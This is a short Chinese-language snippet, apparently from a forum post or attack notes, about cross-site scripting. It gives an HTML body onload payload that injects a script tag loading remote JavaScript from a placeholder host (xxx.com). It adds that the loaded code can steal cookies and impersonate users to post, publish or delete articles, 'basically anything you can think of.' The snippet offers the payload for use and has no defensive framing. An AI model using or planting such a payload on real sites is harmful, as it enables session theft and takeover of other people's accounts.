<body onload="document.write('<script src=http://xxx.com/js/main.js></script>')"> 加载一段远程的JS 里面的代码自由发挥可以盗取cookie
模拟用户发帖 发文章 删除文章 基本上 只要你想到的 多可以做到